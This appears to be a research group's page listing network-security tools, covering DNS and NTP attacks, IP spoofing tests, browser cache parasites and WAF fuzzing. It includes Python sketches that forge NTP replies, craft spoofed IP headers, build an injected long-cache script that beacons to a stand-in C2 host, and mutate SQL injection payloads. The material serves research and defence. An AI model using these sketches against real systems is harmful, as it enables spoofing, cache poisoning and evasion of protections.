A framework to differentiate erroneous ROAs from prefix hijacks. It enables network operators to avoid blocking legitimate traffic while continuing to prevent prefix hijacking attacks. More details here: https://rose.smart-validator.net/
The Dependency Detective visualises the requests of any website. It is especially designed to check a website for third-party dependencies. Privacy is a privilege: third-party dependencies can be used to track the behaviour of users. With the Dependency Detective you can check websites of your choice on your own. Additionally, statistics on the usage of third-party dependencies across all websites crawled so far are available. Dependency Detective initially crawled the homepages of the top 100,000 websites of the Majestic Million list to ensure meaningful statistics. More details here: https://dependency-detective.cad.sit.fraunhofer.de/
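The core classification step can be illustrated with a small sketch. The function name `third_party_hosts` and the naive "last two DNS labels" site grouping are our own simplifications (a real crawler would consult the Public Suffix List), not the tool's actual implementation:

```python
from urllib.parse import urlparse

def third_party_hosts(page_url, request_urls):
    """Classify requested URLs as third-party relative to the visited page.

    Naive sketch: two hosts are treated as the same party when their last
    two DNS labels match; real crawlers use the Public Suffix List instead.
    """
    def site(host):
        return ".".join(host.split(".")[-2:])

    page_site = site(urlparse(page_url).hostname)
    return sorted({
        urlparse(u).hostname
        for u in request_urls
        if urlparse(u).hostname and site(urlparse(u).hostname) != page_site
    })

hosts = third_party_hosts(
    "https://example.com/",
    ["https://cdn.example.com/app.js",      # same site -> first party
     "https://tracker.ads-network.net/px",  # third party
     "https://fonts.example.org/f.woff"],   # third party
)
print(hosts)  # ['fonts.example.org', 'tracker.ads-network.net']
```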
DNS Cache Test is a new tool for measuring DNS resolution platforms. Our tool identifies the different components in DNS resolution platforms, in particular the IP addresses used for looking up records in nameservers and the caches. We infer the number of caches used as well as the DNS software of the caches. Our tool utilises the caching behaviour and the standard DNS protocol behaviour to collect and analyse the data. More details here.
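One way caching behaviour can reveal the number of caches is via TTL decay: each cache inserted the record at its own moment, so the expiry instant (query time plus remaining TTL) is constant per cache. The sketch below illustrates that idea under our own simplifying assumptions (no clock jitter, exact TTLs); it is not the tool's actual inference method:

```python
def estimate_cache_count(observations):
    """Estimate how many independent caches sit behind a resolver.

    `observations` is a list of (query_time_seconds, remaining_ttl) pairs
    for repeated queries of the same record. Each cache inserted the
    record at its own time, so query_time + remaining_ttl (the record's
    expiry instant) is constant per cache; distinct expiry values give a
    lower bound on the number of caches. Sketch only -- a real
    measurement must tolerate clock jitter.
    """
    expiries = {t + ttl for t, ttl in observations}
    return len(expiries)

# Two caches: one copy expires at t=3600, the other at t=3610.
obs = [(0, 3600), (1, 3609), (2, 3598), (3, 3607), (4, 3596)]
print(estimate_cache_count(obs))  # 2
```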
DNSSEC Dashboard – monitors DNSSEC deployment and typical misconfigurations among Top Level Domains and popular domains. More details here.
A framework that helps users check whether their ISP is censoring or blocking certain webpages, along with some interesting statistics and great visualisations.
This tool checks whether a website is vulnerable to known SSL attacks.
More details here.
Transputation is a Transport Framework for Secure Computation. The tool makes it possible for developers to perform real-life evaluations and receive immediate results without the need to install or use any traffic-monitoring tools. Transputation can be accessed here.
The source code implementation of Transputation is available here.
Demonstrates how an off-path attacker can shift time on a victim system that synchronises its clock via NTP by attacking the NTP client's DNS lookups. This includes a practical attack demonstration against various NTP implementations and even a theoretical attack scenario against a security-improved NTP client. More details here.
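Once the client's DNS lookup for its NTP pool is redirected to an attacker-controlled host, that host can answer with arbitrary timestamps. The sketch below builds a minimal forged NTP server reply with a shifted transmit timestamp; it is an illustration of the mechanism under our own assumptions, not the attack tooling from the work:

```python
import struct

NTP_EPOCH_OFFSET = 2208988800  # seconds between 1900 (NTP epoch) and 1970 (Unix epoch)

def forged_ntp_response(unix_now, shift_seconds):
    """Build a minimal 48-byte NTP server reply whose transmit timestamp
    is shifted by `shift_seconds` -- the payload a malicious "NTP server"
    could return once the client's DNS lookup has been redirected to it.
    Sketch only: a real reply must also echo the client's origin timestamp.
    """
    li_vn_mode = (0 << 6) | (4 << 3) | 4  # LI=0, version 4, mode 4 (server)
    ntp_seconds = unix_now + NTP_EPOCH_OFFSET + shift_seconds
    pkt = bytearray(48)
    pkt[0] = li_vn_mode
    struct.pack_into("!II", pkt, 40, ntp_seconds, 0)  # transmit timestamp
    return bytes(pkt)

def transmit_time_unix(pkt):
    """Extract the transmit timestamp as a Unix time."""
    seconds, _frac = struct.unpack_from("!II", pkt, 40)
    return seconds - NTP_EPOCH_OFFSET

pkt = forged_ntp_response(unix_now=1_700_000_000, shift_seconds=-3600)
print(transmit_time_unix(pkt) - 1_700_000_000)  # -3600: victim pulled back one hour
```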
Based on work in which we present novel methods to test whether a network enforces ingress filtering, i.e., whether it is vulnerable to IP spoofing attacks. Statistics as well as domain troubleshooting are available online. (This work is still under submission.)
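The basic measurement idea can be sketched as follows: craft a packet whose source address is spoofed and see whether it reaches a measurement collector. Networks that enforce ingress/egress filtering (BCP 38) drop it; unfiltered ones deliver it. The header builder below is our own illustration (the addresses are documentation prefixes), not the paper's measurement code:

```python
import socket
import struct

def ipv4_header(src_ip, dst_ip, payload_len, proto=17):
    """Craft a raw IPv4 header with an arbitrary (spoofed) source address.

    If such a packet, sent from inside a network, arrives at an external
    collector, that network does not filter spoofed traffic. Sketch only:
    actually transmitting it requires a raw socket and root privileges.
    """
    ver_ihl, tos, total_len = 0x45, 0, 20 + payload_len
    ident, flags_frag, ttl = 0, 0, 64
    hdr = struct.pack("!BBHHHBBH4s4s", ver_ihl, tos, total_len, ident,
                      flags_frag, ttl, proto, 0,  # checksum left at 0 for now
                      socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    # RFC 1071 one's-complement checksum over the 16-bit words of the header
    csum = sum(struct.unpack("!10H", hdr))
    csum = (csum & 0xFFFF) + (csum >> 16)
    csum = (csum & 0xFFFF) + (csum >> 16)
    return hdr[:10] + struct.pack("!H", ~csum & 0xFFFF) + hdr[12:]

hdr = ipv4_header("198.51.100.7", "203.0.113.9", payload_len=8)
print(len(hdr), hdr[12:16] == socket.inet_aton("198.51.100.7"))  # 20 True
```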
Pseudorandom Generators (PRGs) play an important role in the security of systems and cryptographic mechanisms. Yet there is a long history of vulnerabilities in practical PRGs. Significant efforts in the theoretical and practical research communities are invested in improving the security of PRGs, identifying faults in entropy sources, and detecting vulnerabilities that allow attacks against PRGs. In this work we take an alternative approach to the pseudo-randomness generation problem. We design and implement the Network Pseudo-randomness Collector (NPC), which collects pseudorandom strings from servers on the Internet. NPC requires neither cooperation nor synchronisation of those servers. NPC is easy to use and to integrate into existing systems. We analyse the security of NPC and show how it addresses the main factors behind the vulnerabilities in current PRGs. More details here.
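The collection idea can be sketched with a simple mixer: gather unpredictable strings that remote servers emit anyway and hash them into a seed. This is our own minimal illustration of the concept, not NPC's actual construction; the function and sample names are made up:

```python
import hashlib

def mix_network_randomness(samples, local_nonce):
    """Mix pseudorandom strings collected from independent remote servers
    into one seed (a sketch of the NPC idea, not its actual design).

    Each sample is hashed individually before being fed into a running
    SHA-256 state together with a local nonce, so the seed remains
    unpredictable as long as at least one source -- or the nonce -- is
    unknown to the attacker.
    """
    h = hashlib.sha256(local_nonce)
    for s in samples:
        h.update(hashlib.sha256(s).digest())  # fixed-size, order-binding
    return h.digest()

# e.g. TLS ServerRandom values, session cookies, DNS transaction IDs ...
samples = [b"server-random-1", b"session-id-abc", b"txid-0x9f31"]
seed = mix_network_randomness(samples, local_nonce=b"boot-7")
print(len(seed))  # 32
```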
In this study, we test the in-the-wild vulnerability of DNS resolvers on the Internet to a newly discovered type of cache poisoning attack that relies on misinterpretation of the special characters \000 and \., which, contrary to the popular belief of many developers, are actually allowed inside DNS labels per RFC6895. We provide selected statistics over various properties of the resolvers we tested, such as Autonomous System (AS), country, implementation, and whether the resolver is detected as a forwarder or a recursive resolver.
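The root of the misinterpretation is that DNS wire format length-prefixes each label, so any octet, including a zero byte or a literal dot, is legal inside a label; software that round-trips names through a dotted text string loses that distinction. A minimal encoder sketch (our own illustration, with made-up example names, not the study's test harness):

```python
import struct

def encode_qname(labels):
    """Encode DNS labels in wire format: each label is length-prefixed,
    so ANY octet -- including 0x00 and a literal '.' -- is legal inside
    it. Vulnerable software converts the wire form back to a dotted
    string and loses that distinction, which cache-poisoning attacks of
    this type abuse.
    """
    out = b""
    for label in labels:
        out += struct.pack("!B", len(label)) + label
    return out + b"\x00"  # zero-length root label terminates the name

# One label containing a zero byte, one containing a literal dot:
wire = encode_qname([b"a\x00b", b"evil.com", b"victim", b"example"])
# Naively re-serialised as text, "evil.com" looks like two labels:
naive = b".".join([b"a\x00b", b"evil.com", b"victim", b"example"])
print(wire != naive, b"evil.com" in wire)  # True True
```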
We identify and explore a new type of malicious script attack: the persistent parasite attack. Persistent parasites are stealthy scripts which persist for a long time in the browser's cache. We show how to use the parasites to build a botnet that runs entirely in the browser and is controlled by a remote attacker. Our attack does not require the victim to install any software. We implement a prototypical attacker that injects parasites into victim clients' caches via TCP injection (when the attacker is connected to the same WiFi network as the victim) as well as remotely, by redirecting traffic to its hosts via DNS cache poisoning. Once the cache is infected, the parasites propagate to other popular websites on the victim client. We show how to design the parasites so that they stay in the victim's cache under the attacker's control for a long time, not restricted to the duration of the user's visit to the website. We then demonstrate how to leverage the parasites to perform sophisticated attacks against a range of applications. We devise covert channels for communication between the attacker and the parasites, which allow the attacker to control which scripts are executed and when, and to exfiltrate private information, such as cookies and passwords, to the attacker. Finally, we provide recommendations for countermeasures. More details here.
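The persistence step hinges on caching headers: an injected response can declare itself fresh for a very long time, so the browser keeps serving the parasite without ever revalidating it. The snippet below is a hedged illustration of such a response (the function name and the beacon URL are invented; real parasites are more elaborate):

```python
def injected_response(script_body):
    """Build the HTTP response an injector could plant for a popular
    script URL so the parasite persists in the browser cache (sketch).

    `max-age=31536000` keeps the copy fresh for a year; `immutable`
    discourages revalidation, so the legitimate server never gets a
    chance to replace the script.
    """
    headers = [
        b"HTTP/1.1 200 OK",
        b"Content-Type: application/javascript",
        b"Cache-Control: public, max-age=31536000, immutable",
        b"Content-Length: " + str(len(script_body)).encode(),
    ]
    return b"\r\n".join(headers) + b"\r\n\r\n" + script_body

resp = injected_response(b"/* parasite */ fetch('https://c2.invalid/beacon');")
print(b"max-age=31536000" in resp)  # True
```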
This is a research application for the automatic and periodic security evaluation of web application firewalls (WAFs).
WAFuzz can test the capabilities of WAFs to protect web applications:
1. one-time, to enable users to make qualified comparisons between different WAFs, and
2. periodically, to make sure that WAFs continuously protect their web applications, even after system changes and updates.
It tests single or combined WAF configurations, performs predefined or custom attacks against a vulnerable web server, and analyses whether the WAF(s) prevented the attacks. It generates reports with the relevant data, including raw requests and performance information. It also supports long-running randomised evaluations which permute evasive attack patterns to detect subtle attack holes. Additionally, it supports different combination modes to research the security of combined (different) WAFs.
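Permuting evasive attack patterns can be sketched as chaining simple payload transformations in every order and collecting the distinct variants. The transformations and function name below are our own illustrative choices, not WAFuzz's actual mutation set:

```python
import itertools
import urllib.parse

def evasion_variants(payload, rounds=2):
    """Generate evasive permutations of one attack payload by chaining
    simple transformations in every order -- the kind of mutation a WAF
    fuzzer can use to probe for detection gaps (sketch; real evasion
    techniques are far more varied)."""
    transforms = {
        "upper": str.upper,
        "urlencode": lambda s: urllib.parse.quote(s, safe=""),
        "comment": lambda s: s.replace(" ", "/**/"),  # SQL comment as whitespace
    }
    variants = set()
    for chain in itertools.permutations(transforms.values(), rounds):
        v = payload
        for t in chain:
            v = t(v)
        variants.add(v)
    return variants

vs = evasion_variants("' or 1=1 --")
print(len(vs))
```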
This project is currently under active development at the Fraunhofer Institute for Secure Information Technology and is not publicly available yet. If you are interested or have further questions, please contact WAFuzz. More details here.
CombiWAF is a research application for the robust combination of web application firewalls (WAFs). The main idea is that every WAF has weaknesses in different areas, and by combining them we can increase the security of the protected web server. The system consists of two parts:
- The distributor receives incoming HTTP(S) requests from external clients and forwards them to multiple WAFs in parallel. The first response from a WAF is then returned to the external client.
- The combiner receives the requests which the WAFs cleared to reach the protected web server. Depending on the configuration, the combiner decides whether a cleared request should be forwarded to the web server. If so, it forwards it, takes the web server's response, and sends it back through one WAF.
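The distributor's fan-out step can be sketched with a thread pool that submits the request to every WAF and returns the first reply. This is a minimal illustration under our own assumptions (WAFs modelled as plain callables rather than HTTP(S) endpoints), not CombiWAF's implementation:

```python
from concurrent.futures import ThreadPoolExecutor, as_completed
import time

def distribute(request, wafs):
    """Forward one request to several WAFs in parallel and return the
    first response that comes back -- the distributor's role described
    above (sketch; real WAFs would be reached over HTTP(S))."""
    with ThreadPoolExecutor(max_workers=len(wafs)) as pool:
        futures = [pool.submit(waf, request) for waf in wafs]
        for future in as_completed(futures):
            return future.result()  # first completed wins

# Simulated WAFs with different processing delays:
def slow_waf(req):
    time.sleep(0.2)
    return ("slow", req)

def fast_waf(req):
    time.sleep(0.01)
    return ("fast", req)

print(distribute("GET /", [slow_waf, fast_waf]))  # ('fast', 'GET /')
```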